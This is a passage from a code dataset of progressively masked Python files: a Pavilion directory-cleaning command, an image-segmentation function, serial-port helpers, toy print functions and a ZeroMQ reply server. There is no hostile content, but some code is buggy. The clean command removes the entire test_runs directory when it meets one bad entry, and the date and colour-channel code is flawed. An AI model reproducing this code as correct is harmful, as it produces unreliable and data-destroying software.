download_time < cutoff_date:\n try:\n shutil.rmtree((download_dir / download).as_posix())\n except NotADirectoryError:\n output.fprint('{} is not a directory.'.format(\n download), file=self.errfile, color=output.RED)\n os.remove((download_dir / download).as_posix())\n if args.verbose:\n output.fprint('Removed download {}'.format(download\n ), file=self.outfile)\n elif args.verbose:\n output.fprint('Skipped download {}'.format(download),\n file=self.outfile)\n except PermissionError as err:\n err = str(err).split(\"'\")\n output.fprint('Permission Error: {} cannot be removed'.\n format(err[1]), file=self.errfile, color=31)\n output.fprint('Removing Builds...', file=self.outfile, color=output\n .GREEN)\n for build in os.listdir(build_dir.as_posix()):\n try:\n build_time = datetime.fromtimestamp(os.path.getmtime((\n build_dir / build).as_posix()))\n if build_time < cutoff_date and build not in dependent_builds:\n shutil.rmtree((build_dir / build).as_posix())\n if args.verbose:\n output.fprint('Removed build {}'.format(build),\n file=self.outfile)\n elif args.verbose:\n output.fprint('Skipped build {}'.format(build), file=\n self.outfile)\n except PermissionError as err:\n err = str(err).split(\"'\")\n output.fprint('Permission Error: {} cannot be removed. '.\n format(err[1]), file=self.errfile, color=31)\n return 0\n\n\ndef get_month_delta(months):\n \"\"\"Turn a number of months in the future into a concrete date.\"\"\"\n today = datetime.today()\n cur_year = today.year\n cur_day = today.day\n cur_month = today.month\n cur_time = today.time\n if cur_month - months <= 0:\n cut_month = (cur_month - months) % 12\n diff_years = (cur_month - months) // 12\n cut_year = cur_year + diff_years\n else:\n cut_month = cur_month - months\n cut_year = cur_year\n try:\n cutoff_date = datetime(cut_year, cut_month, cur_day, cur_time)\n except ValueError:\n last_day = monthrange(cut_year, cut_month)[1]\n cutoff_date = datetime(cut_year, cut_month, last_day, cur_time)\n return cutoff_date\n",
"step-4": "import errno\nimport os\nimport shutil\nfrom calendar import monthrange\nfrom datetime import datetime, timedelta\nfrom pavilion import output\nfrom pavilion import commands\nfrom pavilion.status_file import STATES\nfrom pavilion.test_run import TestRun, TestRunError, TestRunNotFoundError\n\n\nclass CleanCommand(commands.Command):\n \"\"\"Cleans outdated test and series run directories.\"\"\"\n\n def __init__(self):\n super().__init__('clean', 'Clean up Pavilion working directory.',\n short_help='Clean up Pavilion working diretory.')\n\n def _setup_arguments(self, parser):\n parser.add_argument('-v', '--verbose', action='store_true', default\n =False, help='Verbose output.')\n parser.add_argument('--older-than', nargs='+', action='store', help\n =\n 'Set the max age of files to be removed. Can be a date ex:\"Jan 1 2019\" or , or a number of days/weeks ex:\"32 weeks\"'\n )\n\n def run(self, pav_cfg, args):\n \"\"\"Run this command.\"\"\"\n if args.older_than:\n if 'day' in args.older_than or 'days' in args.older_than:\n cutoff_date = datetime.today() - timedelta(days=int(args.\n older_than[0]))\n elif 'week' in args.older_than or 'weeks' in args.older_than:\n cutoff_date = datetime.today() - timedelta(weeks=int(args.\n older_than[0]))\n elif 'month' in args.older_than or 'months' in args.older_than:\n cutoff_date = get_month_delta(int(args.older_than[0]))\n else:\n date = ' '.join(args.older_than)\n try:\n cutoff_date = datetime.strptime(date, '%b %d %Y')\n except (TypeError, ValueError):\n output.fprint('{} is not a valid date.'.format(args.\n older_than), file=self.errfile, color=output.RED)\n return errno.EINVAL\n else:\n cutoff_date = datetime.today()\n tests_dir = pav_cfg.working_dir / 'test_runs'\n series_dir = pav_cfg.working_dir / 'series'\n download_dir = pav_cfg.working_dir / 'downloads'\n build_dir = pav_cfg.working_dir / 'builds'\n dependent_builds = []\n incomplete_tests = []\n output.fprint('Removing Tests...', file=self.outfile, color=output.\n GREEN)\n for test in os.listdir(tests_dir.as_posix()):\n test_time = datetime.fromtimestamp(os.path.getmtime((tests_dir /\n test).as_posix()))\n try:\n test_obj = TestRun.load(pav_cfg, int(test))\n status = test_obj.status.current().state\n except (TestRunError, TestRunNotFoundError):\n output.fprint('Removing bad test directory {}'.format(test),\n file=self.outfile)\n shutil.rmtree(tests_dir.as_posix())\n continue\n except PermissionError as err:\n err = str(err).split(\"'\")\n output.fprint('Permission Error: {} cannot be removed'.\n format(err[1]), file=self.errfile, color=31)\n if (test_time < cutoff_date and status != STATES.RUNNING and \n status != STATES.SCHEDULED):\n shutil.rmtree((tests_dir / test).as_posix())\n if args.verbose:\n output.fprint('Removed test {}'.format(test), file=self\n .outfile)\n else:\n if args.verbose:\n output.fprint('Skipped test {}'.format(test), file=self\n .outfile)\n incomplete_tests.append(test)\n dependent_builds.append(test_obj.build_name)\n completed_series = True\n output.fprint('Removing Series...', file=self.outfile, color=output\n .GREEN)\n for series in os.listdir(series_dir.as_posix()):\n try:\n series_time = datetime.fromtimestamp(os.path.getmtime((\n series_dir / series).as_posix()))\n for test in incomplete_tests:\n if os.path.exists((series_dir / series / test).as_posix()):\n completed_series = False\n if series_time < cutoff_date and completed_series:\n shutil.rmtree((series_dir / series).as_posix())\n if args.verbose:\n output.fprint('Removed series {}'.format(series),\n file=self.outfile)\n elif args.verbose:\n output.fprint('Skipped series {}'.format(series), file=\n self.outfile)\n except PermissionError as err:\n err = str(err).split(\"'\")\n output.fprint('Permission Error: {} cannot be removed'.\n format(err[1]), file=self.errfile, color=31)\n output.fprint('Removing Downloads...', file=self.outfile, color=\n output.GREEN)\n for download in os.listdir(download_dir.as_posix()):\n try:\n download_time = datetime.fromtimestamp(os.path.getmtime((\n download_dir / download).as_posix()))\n if download_time < cutoff_date:\n try:\n shutil.rmtree((download_dir / download).as_posix())\n except NotADirectoryError:\n output.fprint('{} is not a directory.'.format(\n download), file=self.errfile, color=output.RED)\n os.remove((download_dir / download).as_posix())\n if args.verbose:\n output.fprint('Removed download {}'.format(download\n ), file=self.outfile)\n elif args.verbose:\n output.fprint('Skipped download {}'.format(download),\n file=self.outfile)\n except PermissionError as err:\n err = str(err).split(\"'\")\n output.fprint('Permission Error: {} cannot be removed'.\n format(err[1]), file=self.errfile, color=31)\n output.fprint('Removing Builds...', file=self.outfile, color=output\n .GREEN)\n for build in os.listdir(build_dir.as_posix()):\n try:\n build_time = datetime.fromtimestamp(os.path.getmtime((\n build_dir / build).as_posix()))\n if build_time < cutoff_date and build not in dependent_builds:\n shutil.rmtree((build_dir / build).as_posix())\n if args.verbose:\n output.fprint('Removed build {}'.format(build),\n file=self.outfile)\n elif args.verbose:\n output.fprint('Skipped build {}'.format(build), file=\n self.outfile)\n except PermissionError as err:\n err = str(err).split(\"'\")\n output.fprint('Permission Error: {} cannot be removed. '.\n format(err[1]), file=self.errfile, color=31)\n return 0\n\n\ndef get_month_delta(months):\n \"\"\"Turn a number of months in the future into a concrete date.\"\"\"\n today = datetime.today()\n cur_year = today.year\n cur_day = today.day\n cur_month = today.month\n cur_time = today.time\n if cur_month - months <= 0:\n cut_month = (cur_month - months) % 12\n diff_years = (cur_month - months) // 12\n cut_year = cur_year + diff_years\n else:\n cut_month = cur_month - months\n cut_year = cur_year\n try:\n cutoff_date = datetime(cut_year, cut_month, cur_day, cur_time)\n except ValueError:\n last_day = monthrange(cut_year, cut_month)[1]\n cutoff_date = datetime(cut_year, cut_month, last_day, cur_time)\n return cutoff_date\n",
"step-5": "import errno\nimport os\nimport shutil\nfrom calendar import monthrange\nfrom datetime import datetime, timedelta\n\nfrom pavilion import output\nfrom pavilion import commands\nfrom pavilion.status_file import STATES\nfrom pavilion.test_run import TestRun, TestRunError, TestRunNotFoundError\n\n\nclass CleanCommand(commands.Command):\n \"\"\"Cleans outdated test and series run directories.\"\"\"\n\n def __init__(self):\n super().__init__(\n 'clean',\n 'Clean up Pavilion working directory.',\n short_help=\"Clean up Pavilion working diretory.\"\n )\n\n def _setup_arguments(self, parser):\n parser.add_argument(\n '-v', '--verbose', action='store_true', default=False,\n help='Verbose output.'\n )\n parser.add_argument(\n '--older-than', nargs='+', action='store',\n help='Set the max age of files to be removed. Can be a date ex:'\n '\"Jan 1 2019\" or , or a number of days/weeks ex:\"32 weeks\"'\n )\n\n def run(self, pav_cfg, args):\n \"\"\"Run this command.\"\"\"\n\n if args.older_than:\n if 'day' in args.older_than or 'days' in args.older_than:\n cutoff_date = datetime.today() - timedelta(\n days=int(args.older_than[0]))\n elif 'week' in args.older_than or 'weeks' in args.older_than:\n cutoff_date = datetime.today() - timedelta(\n weeks=int(args.older_than[0]))\n elif 'month' in args.older_than or 'months' in args.older_than:\n cutoff_date = get_month_delta(int(args.older_than[0]))\n else:\n date = ' '.join(args.older_than)\n try:\n cutoff_date = datetime.strptime(date, '%b %d %Y')\n except (TypeError, ValueError):\n output.fprint(\"{} is not a valid date.\"\n .format(args.older_than),\n file=self.errfile, color=output.RED)\n return errno.EINVAL\n\n # No cutoff specified, removes everything.\n else:\n cutoff_date = datetime.today()\n\n tests_dir = pav_cfg.working_dir / 'test_runs'\n series_dir = pav_cfg.working_dir / 'series'\n download_dir = pav_cfg.working_dir / 'downloads'\n build_dir = pav_cfg.working_dir / 'builds'\n\n dependent_builds = []\n incomplete_tests = []\n # Clean Tests\n output.fprint(\"Removing Tests...\", file=self.outfile,\n color=output.GREEN)\n for test in os.listdir(tests_dir.as_posix()):\n test_time = datetime.fromtimestamp(\n os.path.getmtime((tests_dir / test).as_posix()))\n try:\n test_obj = TestRun.load(pav_cfg, int(test))\n status = test_obj.status.current().state\n except (TestRunError, TestRunNotFoundError):\n output.fprint(\"Removing bad test directory {}\".format(test),\n file=self.outfile)\n shutil.rmtree(tests_dir.as_posix())\n continue\n except PermissionError as err:\n err = str(err).split(\"'\")\n output.fprint(\"Permission Error: {} cannot be removed\"\n .format(err[1]), file=self.errfile, color=31)\n if test_time < cutoff_date and status != STATES.RUNNING \\\n and status != STATES.SCHEDULED:\n shutil.rmtree((tests_dir / test).as_posix())\n if args.verbose:\n output.fprint(\"Removed test {}\".format(test),\n file=self.outfile)\n else:\n if args.verbose:\n output.fprint(\"Skipped test {}\".format(test),\n file=self.outfile)\n incomplete_tests.append(test)\n dependent_builds.append(test_obj.build_name)\n\n # Clean Series\n completed_series = True\n output.fprint(\"Removing Series...\", file=self.outfile,\n color=output.GREEN)\n for series in os.listdir(series_dir.as_posix()):\n try:\n series_time = datetime.fromtimestamp(\n os.path.getmtime((series_dir / series).as_posix()))\n for test in incomplete_tests:\n if os.path.exists((series_dir / series / test).as_posix()):\n completed_series = False\n if series_time < cutoff_date and completed_series:\n shutil.rmtree((series_dir / series).as_posix())\n if args.verbose:\n output.fprint(\"Removed series {}\".format(series),\n file=self.outfile)\n else:\n if args.verbose:\n output.fprint(\"Skipped series {}\".format(series),\n file=self.outfile)\n except PermissionError as err:\n err = str(err).split(\"'\")\n output.fprint(\"Permission Error: {} cannot be removed\"\n .format(err[1]), file=self.errfile, color=31)\n\n # Clean Downloads\n output.fprint(\"Removing Downloads...\", file=self.outfile,\n color=output.GREEN)\n for download in os.listdir(download_dir.as_posix()):\n try:\n download_time = datetime.fromtimestamp(\n os.path.getmtime((download_dir / download).as_posix()))\n if download_time < cutoff_date:\n try:\n shutil.rmtree((download_dir / download).as_posix())\n except NotADirectoryError:\n output.fprint(\"{} is not a directory.\".format(download),\n file=self.errfile, color=output.RED)\n os.remove((download_dir / download).as_posix())\n if args.verbose:\n output.fprint(\"Removed download {}\".format(download),\n file=self.outfile)\n else:\n if args.verbose:\n output.fprint(\"Skipped download {}\".format(download),\n file=self.outfile)\n except PermissionError as err:\n err = str(err).split(\"'\")\n output.fprint(\"Permission Error: {} cannot be removed\"\n .format(err[1]), file=self.errfile, color=31)\n\n # Clean Builds\n output.fprint(\"Removing Builds...\", file=self.outfile,\n color=output.GREEN)\n for build in os.listdir(build_dir.as_posix()):\n try:\n build_time = datetime.fromtimestamp(\n os.path.getmtime((build_dir / build).as_posix()))\n if build_time < cutoff_date and build not in dependent_builds:\n shutil.rmtree((build_dir / build).as_posix())\n if args.verbose:\n output.fprint(\"Removed build {}\".format(build),\n file=self.outfile)\n else:\n if args.verbose:\n output.fprint(\"Skipped build {}\".format(build),\n file=self.outfile)\n except PermissionError as err:\n err = str(err).split(\"'\")\n output.fprint(\"Permission Error: {} cannot be removed. \"\n .format(err[1]), file=self.errfile, color=31)\n\n return 0\n\n\ndef get_month_delta(months):\n \"\"\"Turn a number of months in the future into a concrete date.\"\"\"\n\n today = datetime.today()\n cur_year = today.year\n cur_day = today.day\n cur_month = today.month\n cur_time = today.time\n\n if cur_month - months <= 0:\n cut_month = (cur_month - months) % 12\n diff_years = (cur_month - months) // 12\n cut_year = cur_year + diff_years\n else:\n cut_month = cur_month - months\n cut_year = cur_year\n\n try:\n cutoff_date = datetime(cut_year, cut_month, cur_day, cur_time)\n except ValueError:\n last_day = monthrange(cut_year, cut_month)[1]\n cutoff_date = datetime(cut_year, cut_month, last_day, cur_time)\n\n return cutoff_date\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
import torch
import numpy as np
import cv2
import torchvision
from PIL import Image
def people_on_image(path_to_image):
color_map = [
(255, 255, 255), # background
(255, 255, 255), # aeroplane
(255, 255, 255), # bicycle
(255, 255, 255), # bird
(255, 255, 255), # boat
(255, 255, 255), # bottle
(255, 255, 255), # bus
(255, 255, 255), # car
(255, 255, 255), # cat
(255, 255, 255), # chair
(255, 255, 255), # cow
(255, 255, 255), # dining table
(255, 255, 255), # dog
(255, 255, 255), # horse
(255, 255, 255), # motorbike
(255, 0, 0), # person
(255, 255, 255), # potted plant
(255, 255, 255), # sheep
(255, 255, 255), # sofa
(255, 255, 255), # train
(255, 255, 255) # tv/monitor
]
trans = torchvision.transforms.Compose([
torchvision.transforms.Resize(540),
torchvision.transforms.CenterCrop(520),
torchvision.transforms.ToTensor(),
torchvision.transforms.Normalize(
(0.485, 0.456, 0.406), (0.229, 0.224, 0.225))])
model = torchvision.models.segmentation.fcn_resnet50(pretrained=True)
model.eval()
image = Image.open(path_to_image)
image = trans(image)
image = image.unsqueeze(0)
out = model(image)
labels = torch.argmax(out['out'].squeeze(), dim=0).detach().cpu().numpy()
red_map = np.zeros_like(labels).astype(np.uint8)
green_map = np.zeros_like(labels).astype(np.uint8)
blue_map = np.zeros_like(labels).astype(np.uint8)
for label_num in range(0, len(color_map)):
index = labels == label_num
red_map[index] = np.array(color_map)[label_num, 0]
blue_map[index] = np.array(color_map)[label_num, 1]
green_map[index] = np.array(color_map)[label_num, 2]
ready_image = np.stack([red_map, green_map, blue_map], axis=2)
image = np.array(image)
image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)
ready_image = cv2.cvtColor(ready_image, cv2.COLOR_RGB2BGR)
cv2.addWeighted(ready_image, 0.6, image, 0.4, 0)
return ready_image
|
normal
|
{
"blob_id": "2193c97b7f1fcf204007c2528ecc47cbf3c67e81",
"index": 9992,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef people_on_image(path_to_image):\n color_map = [(255, 255, 255), (255, 255, 255), (255, 255, 255), (255, \n 255, 255), (255, 255, 255), (255, 255, 255), (255, 255, 255), (255,\n 255, 255), (255, 255, 255), (255, 255, 255), (255, 255, 255), (255,\n 255, 255), (255, 255, 255), (255, 255, 255), (255, 255, 255), (255,\n 0, 0), (255, 255, 255), (255, 255, 255), (255, 255, 255), (255, 255,\n 255), (255, 255, 255)]\n trans = torchvision.transforms.Compose([torchvision.transforms.Resize(\n 540), torchvision.transforms.CenterCrop(520), torchvision.\n transforms.ToTensor(), torchvision.transforms.Normalize((0.485, \n 0.456, 0.406), (0.229, 0.224, 0.225))])\n model = torchvision.models.segmentation.fcn_resnet50(pretrained=True)\n model.eval()\n image = Image.open(path_to_image)\n image = trans(image)\n image = image.unsqueeze(0)\n out = model(image)\n labels = torch.argmax(out['out'].squeeze(), dim=0).detach().cpu().numpy()\n red_map = np.zeros_like(labels).astype(np.uint8)\n green_map = np.zeros_like(labels).astype(np.uint8)\n blue_map = np.zeros_like(labels).astype(np.uint8)\n for label_num in range(0, len(color_map)):\n index = labels == label_num\n red_map[index] = np.array(color_map)[label_num, 0]\n blue_map[index] = np.array(color_map)[label_num, 1]\n green_map[index] = np.array(color_map)[label_num, 2]\n ready_image = np.stack([red_map, green_map, blue_map], axis=2)\n image = np.array(image)\n image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)\n ready_image = cv2.cvtColor(ready_image, cv2.COLOR_RGB2BGR)\n cv2.addWeighted(ready_image, 0.6, image, 0.4, 0)\n return ready_image\n",
"step-3": "import torch\nimport numpy as np\nimport cv2\nimport torchvision\nfrom PIL import Image\n\n\ndef people_on_image(path_to_image):\n color_map = [(255, 255, 255), (255, 255, 255), (255, 255, 255), (255, \n 255, 255), (255, 255, 255), (255, 255, 255), (255, 255, 255), (255,\n 255, 255), (255, 255, 255), (255, 255, 255), (255, 255, 255), (255,\n 255, 255), (255, 255, 255), (255, 255, 255), (255, 255, 255), (255,\n 0, 0), (255, 255, 255), (255, 255, 255), (255, 255, 255), (255, 255,\n 255), (255, 255, 255)]\n trans = torchvision.transforms.Compose([torchvision.transforms.Resize(\n 540), torchvision.transforms.CenterCrop(520), torchvision.\n transforms.ToTensor(), torchvision.transforms.Normalize((0.485, \n 0.456, 0.406), (0.229, 0.224, 0.225))])\n model = torchvision.models.segmentation.fcn_resnet50(pretrained=True)\n model.eval()\n image = Image.open(path_to_image)\n image = trans(image)\n image = image.unsqueeze(0)\n out = model(image)\n labels = torch.argmax(out['out'].squeeze(), dim=0).detach().cpu().numpy()\n red_map = np.zeros_like(labels).astype(np.uint8)\n green_map = np.zeros_like(labels).astype(np.uint8)\n blue_map = np.zeros_like(labels).astype(np.uint8)\n for label_num in range(0, len(color_map)):\n index = labels == label_num\n red_map[index] = np.array(color_map)[label_num, 0]\n blue_map[index] = np.array(color_map)[label_num, 1]\n green_map[index] = np.array(color_map)[label_num, 2]\n ready_image = np.stack([red_map, green_map, blue_map], axis=2)\n image = np.array(image)\n image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)\n ready_image = cv2.cvtColor(ready_image, cv2.COLOR_RGB2BGR)\n cv2.addWeighted(ready_image, 0.6, image, 0.4, 0)\n return ready_image\n",
"step-4": "import torch\r\nimport numpy as np\r\nimport cv2\r\nimport torchvision\r\nfrom PIL import Image\r\n\r\n\r\n\r\ndef people_on_image(path_to_image):\r\n\r\n color_map = [\r\n (255, 255, 255), # background\r\n (255, 255, 255), # aeroplane\r\n (255, 255, 255), # bicycle\r\n (255, 255, 255), # bird\r\n (255, 255, 255), # boat\r\n (255, 255, 255), # bottle\r\n (255, 255, 255), # bus\r\n (255, 255, 255), # car\r\n (255, 255, 255), # cat\r\n (255, 255, 255), # chair\r\n (255, 255, 255), # cow\r\n (255, 255, 255), # dining table\r\n (255, 255, 255), # dog\r\n (255, 255, 255), # horse\r\n (255, 255, 255), # motorbike\r\n (255, 0, 0), # person\r\n (255, 255, 255), # potted plant\r\n (255, 255, 255), # sheep\r\n (255, 255, 255), # sofa\r\n (255, 255, 255), # train\r\n (255, 255, 255) # tv/monitor\r\n ]\r\n trans = torchvision.transforms.Compose([\r\n torchvision.transforms.Resize(540),\r\n torchvision.transforms.CenterCrop(520),\r\n torchvision.transforms.ToTensor(),\r\n torchvision.transforms.Normalize(\r\n (0.485, 0.456, 0.406), (0.229, 0.224, 0.225))])\r\n\r\n model = torchvision.models.segmentation.fcn_resnet50(pretrained=True)\r\n model.eval()\r\n\r\n image = Image.open(path_to_image)\r\n image = trans(image)\r\n image = image.unsqueeze(0)\r\n out = model(image)\r\n\r\n labels = torch.argmax(out['out'].squeeze(), dim=0).detach().cpu().numpy()\r\n\r\n red_map = np.zeros_like(labels).astype(np.uint8)\r\n green_map = np.zeros_like(labels).astype(np.uint8)\r\n blue_map = np.zeros_like(labels).astype(np.uint8)\r\n\r\n for label_num in range(0, len(color_map)):\r\n index = labels == label_num\r\n red_map[index] = np.array(color_map)[label_num, 0]\r\n blue_map[index] = np.array(color_map)[label_num, 1]\r\n green_map[index] = np.array(color_map)[label_num, 2]\r\n\r\n ready_image = np.stack([red_map, green_map, blue_map], axis=2)\r\n\r\n image = np.array(image)\r\n image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)\r\n ready_image = cv2.cvtColor(ready_image, cv2.COLOR_RGB2BGR)\r\n cv2.addWeighted(ready_image, 0.6, image, 0.4, 0)\r\n return ready_image\r\n\r\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import serial
import time
from Files_management import get_mov_parameters,change_mov_parameters
#-------------------------------------------------------------------------------
def create_port():
port = get_mov_parameters()[1]
try:
ser = serial.Serial(port=port,baudrate=9600,timeout=1)
return ser
except:
print('Open port failded')
change_mov_parameters('0',port,'0','0')
return False
#-------------------------------------------------------------------------------
def port_status(ser):
if(ser.isOpen()):
if(get_mov_parameters()[0] == "1" or get_mov_parameters()[0] == "True"):
return True
else:
try:
create_port()
return True
except:
print("error opening")
change_mov_parameters('0',get_mov_parameters()[1],'0','0')
return False
#-------------------------------------------------------------------------------
def close_port(ser):
ser.close()
#-------------------------------------------------------------------------------
def send_value(value):
port = create_port()
status = get_mov_parameters()[0]
if(port_status(port)):
if(status == '1' or status == 'True'):
string = "".join([str(value),' \n'])
port.write(string.encode())
print('True')
else :
print('False')
|
normal
|
{
"blob_id": "72cda573bf9c744213a2957d51171f437f211353",
"index": 3467,
"step-1": "<mask token>\n\n\ndef send_value(value):\n port = create_port()\n status = get_mov_parameters()[0]\n if port_status(port):\n if status == '1' or status == 'True':\n string = ''.join([str(value), ' \\n'])\n port.write(string.encode())\n print('True')\n else:\n print('False')\n",
"step-2": "<mask token>\n\n\ndef create_port():\n port = get_mov_parameters()[1]\n try:\n ser = serial.Serial(port=port, baudrate=9600, timeout=1)\n return ser\n except:\n print('Open port failded')\n change_mov_parameters('0', port, '0', '0')\n return False\n\n\ndef port_status(ser):\n if ser.isOpen():\n if get_mov_parameters()[0] == '1' or get_mov_parameters()[0] == 'True':\n return True\n else:\n try:\n create_port()\n return True\n except:\n print('error opening')\n change_mov_parameters('0', get_mov_parameters()[1], '0', '0')\n return False\n\n\n<mask token>\n\n\ndef send_value(value):\n port = create_port()\n status = get_mov_parameters()[0]\n if port_status(port):\n if status == '1' or status == 'True':\n string = ''.join([str(value), ' \\n'])\n port.write(string.encode())\n print('True')\n else:\n print('False')\n",
"step-3": "<mask token>\n\n\ndef create_port():\n port = get_mov_parameters()[1]\n try:\n ser = serial.Serial(port=port, baudrate=9600, timeout=1)\n return ser\n except:\n print('Open port failded')\n change_mov_parameters('0', port, '0', '0')\n return False\n\n\ndef port_status(ser):\n if ser.isOpen():\n if get_mov_parameters()[0] == '1' or get_mov_parameters()[0] == 'True':\n return True\n else:\n try:\n create_port()\n return True\n except:\n print('error opening')\n change_mov_parameters('0', get_mov_parameters()[1], '0', '0')\n return False\n\n\ndef close_port(ser):\n ser.close()\n\n\ndef send_value(value):\n port = create_port()\n status = get_mov_parameters()[0]\n if port_status(port):\n if status == '1' or status == 'True':\n string = ''.join([str(value), ' \\n'])\n port.write(string.encode())\n print('True')\n else:\n print('False')\n",
"step-4": "import serial\nimport time\nfrom Files_management import get_mov_parameters, change_mov_parameters\n\n\ndef create_port():\n port = get_mov_parameters()[1]\n try:\n ser = serial.Serial(port=port, baudrate=9600, timeout=1)\n return ser\n except:\n print('Open port failded')\n change_mov_parameters('0', port, '0', '0')\n return False\n\n\ndef port_status(ser):\n if ser.isOpen():\n if get_mov_parameters()[0] == '1' or get_mov_parameters()[0] == 'True':\n return True\n else:\n try:\n create_port()\n return True\n except:\n print('error opening')\n change_mov_parameters('0', get_mov_parameters()[1], '0', '0')\n return False\n\n\ndef close_port(ser):\n ser.close()\n\n\ndef send_value(value):\n port = create_port()\n status = get_mov_parameters()[0]\n if port_status(port):\n if status == '1' or status == 'True':\n string = ''.join([str(value), ' \\n'])\n port.write(string.encode())\n print('True')\n else:\n print('False')\n",
"step-5": "import serial\nimport time\nfrom Files_management import get_mov_parameters,change_mov_parameters\n\n#-------------------------------------------------------------------------------\ndef create_port():\n port = get_mov_parameters()[1]\n try:\n ser = serial.Serial(port=port,baudrate=9600,timeout=1)\n return ser\n except:\n print('Open port failded')\n change_mov_parameters('0',port,'0','0')\n return False\n\n#-------------------------------------------------------------------------------\ndef port_status(ser):\n if(ser.isOpen()):\n if(get_mov_parameters()[0] == \"1\" or get_mov_parameters()[0] == \"True\"):\n return True\n else: \n try:\n create_port()\n return True\n except:\n print(\"error opening\")\n change_mov_parameters('0',get_mov_parameters()[1],'0','0')\n return False\n\n#-------------------------------------------------------------------------------\ndef close_port(ser):\n ser.close()\n\n#-------------------------------------------------------------------------------\ndef send_value(value):\n port = create_port()\n status = get_mov_parameters()[0]\n if(port_status(port)):\n if(status == '1' or status == 'True'):\n string = \"\".join([str(value),' \\n'])\n port.write(string.encode())\n print('True')\n else :\n print('False')\n \n",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
def func3(a, b):
return
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def func1(a):
print(f'这是有参数的打印:{a}')
<|reserved_special_token_0|>
def func2(a, b):
return a + b
<|reserved_special_token_0|>
def func3(a, b):
return
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def func():
print('这是无参数的打印')
<|reserved_special_token_0|>
def func1(a):
print(f'这是有参数的打印:{a}')
<|reserved_special_token_0|>
def func2(a, b):
return a + b
<|reserved_special_token_0|>
def func3(a, b):
return
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def func():
print('这是无参数的打印')
func()
def func1(a):
print(f'这是有参数的打印:{a}')
func1('有参数a')
def func2(a, b):
return a + b
print(f'有返回值打印:{func2(3, 2)}')
def func3(a, b):
return
print(f'无返回值打印:{func3(3, 2)}')
<|reserved_special_token_1|>
def func():
print("这是无参数的打印")
func()
def func1(a):
print(f"这是有参数的打印:{a}")
func1("有参数a")
def func2(a, b):
return a + b
print(f"有返回值打印:{func2(3, 2)}")
def func3(a, b):
return
print(f"无返回值打印:{func3(3, 2)}")
|
flexible
|
{
"blob_id": "be892250c31198e801836dba24fa8218dd50e811",
"index": 1178,
"step-1": "<mask token>\n\n\ndef func3(a, b):\n return\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef func1(a):\n print(f'这是有参数的打印:{a}')\n\n\n<mask token>\n\n\ndef func2(a, b):\n return a + b\n\n\n<mask token>\n\n\ndef func3(a, b):\n return\n\n\n<mask token>\n",
"step-3": "def func():\n print('这是无参数的打印')\n\n\n<mask token>\n\n\ndef func1(a):\n print(f'这是有参数的打印:{a}')\n\n\n<mask token>\n\n\ndef func2(a, b):\n return a + b\n\n\n<mask token>\n\n\ndef func3(a, b):\n return\n\n\n<mask token>\n",
"step-4": "def func():\n print('这是无参数的打印')\n\n\nfunc()\n\n\ndef func1(a):\n print(f'这是有参数的打印:{a}')\n\n\nfunc1('有参数a')\n\n\ndef func2(a, b):\n return a + b\n\n\nprint(f'有返回值打印:{func2(3, 2)}')\n\n\ndef func3(a, b):\n return\n\n\nprint(f'无返回值打印:{func3(3, 2)}')\n",
"step-5": "def func():\n print(\"这是无参数的打印\")\n\n\nfunc()\n\n\ndef func1(a):\n print(f\"这是有参数的打印:{a}\")\n\n\nfunc1(\"有参数a\")\n\n\ndef func2(a, b):\n return a + b\n\n\nprint(f\"有返回值打印:{func2(3, 2)}\")\n\n\ndef func3(a, b):\n return\n\n\nprint(f\"无返回值打印:{func3(3, 2)}\")\n",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
for i in range(11):
print(n, ' X ', i, ' = ', n * i)
<|reserved_special_token_1|>
n = int(input('please enter the number : '))
for i in range(11):
print(n, ' X ', i, ' = ', n * i)
<|reserved_special_token_1|>
n=int(input("please enter the number : "))
for i in range(11):
print(n," X ",i," = ",n*i)
|
flexible
|
{
"blob_id": "ea4a55ed17c5cc2c6f127112af636ca885159c86",
"index": 5768,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor i in range(11):\n print(n, ' X ', i, ' = ', n * i)\n",
"step-3": "n = int(input('please enter the number : '))\nfor i in range(11):\n print(n, ' X ', i, ' = ', n * i)\n",
"step-4": "n=int(input(\"please enter the number : \"))\nfor i in range(11):\n print(n,\" X \",i,\" = \",n*i)",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import time #melakukan import library time
import zmq #melakukan import library ZeroMQ
context = zmq.Context() #melakukan inisialisasi context ZeroMQ pada variable context
socket = context.socket(zmq.REP) #menginisialisasikan socket(Reply) pada variable context(ZeroMQ)
socket.bind("tcp://10.20.32.221:5555") #melakukan binding socket dengan port tcp 5555
while True: #Looping selama kondisi benar
message = socket.recv() #menampung pesan yang diterima oleh socket ke dalam variable message
print("Received request: %s" % message) #melakukan output dari message yang diterima
# do some work
time.sleep(1) #waktu interval untuk istirahat/melakukan proses berikutnya
socket.send(b"World") #mengirim suatu pesan berupa bit pesan ('world') ke dalam socket
|
normal
|
{
"blob_id": "ccba923fa4b07ca9c87c57797e1e6c7da3a71183",
"index": 4315,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nsocket.bind('tcp://10.20.32.221:5555')\nwhile True:\n message = socket.recv()\n print('Received request: %s' % message)\n time.sleep(1)\n socket.send(b'World')\n",
"step-3": "<mask token>\ncontext = zmq.Context()\nsocket = context.socket(zmq.REP)\nsocket.bind('tcp://10.20.32.221:5555')\nwhile True:\n message = socket.recv()\n print('Received request: %s' % message)\n time.sleep(1)\n socket.send(b'World')\n",
